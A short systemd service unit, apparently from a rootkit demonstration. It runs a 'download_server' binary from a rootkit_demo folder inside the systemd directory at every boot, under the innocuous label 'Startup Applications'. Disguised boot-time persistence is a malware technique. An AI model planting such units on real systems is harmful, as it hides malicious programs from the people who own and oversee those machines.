[Unit]
Description=Startup Applications

[Service]
Type=oneshot
RemainAfterExit=false
ExecStart=/etc/systemd/system/rootkit_demo/public/http/download_server

[Install]
WantedBy=multi-user.target 
